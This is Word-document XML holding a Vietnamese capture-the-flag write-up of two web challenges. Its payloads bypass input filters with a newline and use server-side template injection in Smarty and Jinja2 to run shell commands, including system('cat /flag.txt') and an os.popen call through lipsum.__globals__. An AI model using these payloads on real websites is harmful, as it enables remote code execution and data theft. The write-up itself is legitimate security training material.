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E4B684" w14:textId="0E0E3C0D" w:rsidR="002F49FE" w:rsidRPr="00A72DCD" w:rsidRDefault="00A72DCD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A72DCD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Bài 1: Smarty Pants</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53227EEF" w14:textId="6D6C8A36" w:rsidR="00A72DCD" w:rsidRDefault="00A72DCD">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BEB9BD9" w14:textId="4E2DF3D2" w:rsidR="00A72DCD" w:rsidRDefault="00A72DC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Trang web dùng thư viện smarty</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EFAD05" w14:textId="77777777" w:rsidR="00A72DCD" w:rsidRDefault="00A72DCD">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77FF2F54" w14:textId="366E5551" w:rsidR="00A72DCD" w:rsidRDefault="00A72DC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Nó cho bạn 1 danh sách các filter:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C2DE96" w14:textId="63E1EEA4" w:rsidR="00A72DCD" w:rsidRDefault="00A72DCD">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D8CF4B9" w14:textId="511DF000" w:rsidR="00A72DCD" w:rsidRDefault="00A72DCD">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A72DCD">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/(\b)(on\S+)(\s*)=|javascript|&lt;(|\/|[^\/&gt;][^&gt;]+|\/[^&gt;][^&gt;]+)&gt;|({+.*}+)/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048D008D" w14:textId="305ADED1" w:rsidR="00BC3BFB" w:rsidRDefault="00BC3BFB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28E35D9D" w14:textId="72D7D580" w:rsidR="00BC3BFB" w:rsidRDefault="00BC3BF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Phân tích</w:t>
      </w:r>
      <w:r w:rsidR="00185692">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> blacklist</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2687FC" w14:textId="77777777" w:rsidR="00185692" w:rsidRDefault="00185692">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="093DFE87" w14:textId="33249DAD" w:rsidR="00BC3BFB" w:rsidRPr="00185692" w:rsidRDefault="00BC3BFB">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00185692">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/(\b)(on\S+)(\s*)=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC1BA8F" w14:textId="20B33027" w:rsidR="00185692" w:rsidRDefault="0018569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\S: các kí tự không phải là khoảng trắng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154AFF8B" w14:textId="2F4B9696" w:rsidR="00185692" w:rsidRDefault="0018569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\s: các kí tự là khoảng trắng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01DCBCAE" w14:textId="579DA36C" w:rsidR="00185692" w:rsidRDefault="0018569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\b: tìm kiếm ở đầu của 1 từ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5593568D" w14:textId="7B357CB9" w:rsidR="00185692" w:rsidRDefault="0018569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Nếu bạn để payload là ona= </w:t>
      </w:r>
      <w:r w:rsidRPr="00185692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Error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DFED12C" w14:textId="43AB6A83" w:rsidR="00185692" w:rsidRDefault="00185692">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22220227" w14:textId="36211B91" w:rsidR="00185692" w:rsidRPr="00185692" w:rsidRDefault="00185692">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00185692">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>javascript</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F2B4A6A" w14:textId="2AD29BF3" w:rsidR="00185692" w:rsidRDefault="00185692">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CB59224" w14:textId="3E573983" w:rsidR="00185692" w:rsidRDefault="00185692">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00185692">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;(|\/|[^\/&gt;][^&gt;]+|\/[^&gt;][^&gt;]+)&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  Nó chặn &lt;…&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="334633E0" w14:textId="2740F7B0" w:rsidR="00185692" w:rsidRDefault="00185692">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4309C02C" w14:textId="74A16DC7" w:rsidR="00A72DCD" w:rsidRDefault="00185692">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00185692">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">({+.*}+) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">   Nó chặn {…}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FFD626E" w14:textId="77777777" w:rsidR="00185692" w:rsidRDefault="00185692">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68000D9E" w14:textId="2A3BAB62" w:rsidR="00A72DCD" w:rsidRDefault="00BC3BF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Nếu payload của bạn có trong blacklist, ứng dụng sẽ báo Malicious Inputs Detected</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2AAA77" w14:textId="55DA653B" w:rsidR="00185692" w:rsidRDefault="00185692">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="366A65A5" w14:textId="36713272" w:rsidR="00185692" w:rsidRDefault="0018569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Mình sẽ khai thác bằng cách tiêm CRLF</w:t>
      </w:r>
      <w:r w:rsidR="00197DB9">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2D3DAD" w14:textId="38A3E6B3" w:rsidR="00185692" w:rsidRDefault="00185692">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02D62B23" w14:textId="2FA91762" w:rsidR="00185692" w:rsidRDefault="0018569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Payload: </w:t>
      </w:r>
      <w:r w:rsidRPr="00197DB9">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">data={$smarty.version%0a} </w:t>
      </w:r>
      <w:r w:rsidRPr="00185692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4.3.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C5A93C" w14:textId="41FA39F0" w:rsidR="00197DB9" w:rsidRDefault="00197DB9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="378D8F8B" w14:textId="1FA450E2" w:rsidR="00197DB9" w:rsidRPr="00197DB9" w:rsidRDefault="00197DB9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00197DB9">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">{system('cat%20/flag.txt')%0a} </w:t>
      </w:r>
      <w:r w:rsidRPr="00197DB9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</w:t>
      </w:r>
      <w:r w:rsidRPr="00197DB9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Flag: INTIGRITI{fake_flag}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29234007" w14:textId="485C038A" w:rsidR="00185692" w:rsidRDefault="00185692">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57720260" w14:textId="77777777" w:rsidR="009243AF" w:rsidRDefault="009243AF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51151A9A" w14:textId="77777777" w:rsidR="009243AF" w:rsidRDefault="009243AF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E6EC79B" w14:textId="77777777" w:rsidR="009243AF" w:rsidRDefault="009243AF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C18E360" w14:textId="77777777" w:rsidR="009243AF" w:rsidRDefault="009243AF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7154DF52" w14:textId="2AEC7388" w:rsidR="00185692" w:rsidRPr="0047294A" w:rsidRDefault="0047294A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0047294A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Bài 2: Pizza Time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF88220" w14:textId="61A4CC21" w:rsidR="0047294A" w:rsidRDefault="0047294A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F7916A0" w14:textId="2365D975" w:rsidR="00153CEB" w:rsidRDefault="00153CE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Giao diện trang web:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A380B46" w14:textId="5F5FFB67" w:rsidR="0047294A" w:rsidRDefault="00153CE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6CE6859" wp14:editId="194EA69E">
            <wp:extent cx="4354830" cy="3437510"/>
            <wp:effectExtent l="0" t="0" r="127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50" r="26721"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4355432" cy="3437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3C86DF" w14:textId="2D0ED46E" w:rsidR="00153CEB" w:rsidRDefault="00153CEB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="491C03E8" w14:textId="79346A4A" w:rsidR="00153CEB" w:rsidRDefault="00153CE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Trang menu:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ADE8620" w14:textId="77777777" w:rsidR="00153CEB" w:rsidRDefault="00153CEB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6165BCA5" w14:textId="15543579" w:rsidR="00153CEB" w:rsidRDefault="00153CE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7E728DD" wp14:editId="0DEDDC98">
            <wp:extent cx="5943600" cy="3260558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227"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3260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E169D" w14:textId="56691FAE" w:rsidR="00153CEB" w:rsidRDefault="00153CE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Trang đặt hàng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C95E10B" w14:textId="19F13CDE" w:rsidR="00153CEB" w:rsidRDefault="00153CE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3EE06B0" wp14:editId="046FF726">
            <wp:extent cx="4475747" cy="4440914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95" t="7127" r="33603"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4511180" cy="4476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8BE47" w14:textId="5313AE0A" w:rsidR="00153CEB" w:rsidRDefault="00153CEB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A36F1FD" w14:textId="77777777" w:rsidR="00153CEB" w:rsidRDefault="00153CE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Đặt hàng thành công, ứng dụng báo: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BDE6D6D" w14:textId="77777777" w:rsidR="00153CEB" w:rsidRDefault="00153CEB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3508A3EE" w14:textId="2F18D7A6" w:rsidR="00153CEB" w:rsidRPr="00A06437" w:rsidRDefault="00153CEB">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A06437">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Thank you, abc! Your order has been placed. Final price is $9.72</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6715C81B" w14:textId="49AA949E" w:rsidR="00153CEB" w:rsidRDefault="00153CEB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30143EF3" w14:textId="080E199F" w:rsidR="00153CEB" w:rsidRDefault="00153CE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Bạn thấy ứng dụng in tên khách hàng</w:t>
      </w:r>
      <w:r w:rsidR="002A4A76">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> trong phản hồi: abc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B55BCA3" w14:textId="7332742E" w:rsidR="002A4A76" w:rsidRDefault="002A4A76">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71A0070A" w14:textId="5222A3C2" w:rsidR="002A4A76" w:rsidRDefault="002A4A76">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A4A76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SSTI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F1214C" w14:textId="5E970F96" w:rsidR="0089618E" w:rsidRDefault="0089618E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="643DE96C" w14:textId="5548E01F" w:rsidR="0089618E" w:rsidRPr="00A06437" w:rsidRDefault="0089618E" w:rsidP="00DA577E">
      <w:pPr>
        <w:ind w:right="-563"/>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"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Fuzz SSTI: Ứng dụng chặn rất nhiều kí tự: </w:t>
      </w:r>
      <w:r w:rsidRPr="0089618E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r w:rsidR="00DA577E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0089618E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidR="00DA577E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> . _ Nó báo lỗi: </w:t>
      </w:r>
      <w:r w:rsidR="00DA577E" w:rsidRPr="00A06437">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Invalid characters detected!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67CAE17F" w14:textId="6D39B5FA" w:rsidR="00DA577E" w:rsidRPr="00A06437" w:rsidRDefault="00DA577E" w:rsidP="00DA577E">
      <w:pPr>
        <w:ind w:right="-563"/>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A0726CA" w14:textId="6FFCF3E3" w:rsidR="00DA577E" w:rsidRDefault="00DA577E" w:rsidP="00DA577E">
      <w:pPr>
        <w:ind w:right="-563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Mình sẽ áp dụng kĩ thuật CRLF để bypass filter:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56254346" w14:textId="6E92BF5A" w:rsidR="00DA577E" w:rsidRDefault="00DA577E" w:rsidP="00DA577E">
      <w:pPr>
        <w:ind w:right="-563"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EC3C141" w14:textId="66678390" w:rsidR="00DA577E" w:rsidRDefault="00DA577E" w:rsidP="00DA577E">
      <w:pPr>
        <w:ind w:right="-563"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A06437">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>%0a{{7*7}}</w:t>
      </w:r>
      <w:r w:rsidRPr="00A06437">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA577E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</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA577E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Thank you, 49!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2F06CD" w14:textId="2324B7FF" w:rsidR="00DA577E" w:rsidRDefault="00DA577E" w:rsidP="00DA577E">
      <w:pPr>
        <w:ind w:right="-563"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74A5D990" w14:textId="77777777" w:rsidR="00DA577E" w:rsidRDefault="00DA577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Mình chỉ dùng được payload này để RCE: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6193FB82" w14:textId="238A1B62" w:rsidR="002A4A76" w:rsidRPr="00A06437" w:rsidRDefault="00A06437">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A06437">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>%0a</w:t>
      </w:r>
      <w:r w:rsidR="00DA577E" w:rsidRPr="00A06437">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{{lipsum.__globals__["os"].popen('id').read()}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A768F42" w14:textId="3162CE57" w:rsidR="00A06437" w:rsidRDefault="00A06437">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3692A0B8" w14:textId="0F54CE59" w:rsidR="00A06437" w:rsidRDefault="00A0643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Lưu ý: không được để khoảng trắng </w:t>
      </w:r>
      <w:r w:rsidRPr="00A06437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Ứng dụng sẽ báo lỗi 500 Internal Server Error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437CD88A" w14:textId="278C066B" w:rsidR="00A06437" w:rsidRDefault="00A06437">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41DEFA02" w14:textId="4FF32936" w:rsidR="00A06437" w:rsidRDefault="00A0643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B45D1B7" wp14:editId="4B8F350E">
            <wp:extent cx="5787189" cy="3150198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76" t="18467" r="31979" b="27756"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5822330" cy="3169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82F22" w14:textId="77777777" w:rsidR="00A06437" w:rsidRDefault="00A06437">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18969E11" w14:textId="2F702F89" w:rsidR="00A06437" w:rsidRPr="00A06437" w:rsidRDefault="00A06437">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"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Trang web chặn khoảng trắng nên mình chọn </w:t>
      </w:r>
      <w:r w:rsidRPr="00A06437">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cat${IFS}/flag.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DDC5596" w14:textId="08CC4BE3" w:rsidR="00A06437" w:rsidRDefault="00A06437">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="208808A0" w14:textId="3B154279" w:rsidR="00A06437" w:rsidRPr="00A06437" w:rsidRDefault="00A06437">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A06437">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Flag: </w:t>
      </w:r>
      <w:r w:rsidRPr="00A06437">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CTF{this_is_a_fake_flag}</w:t>
      </w:r>
    </w:p>
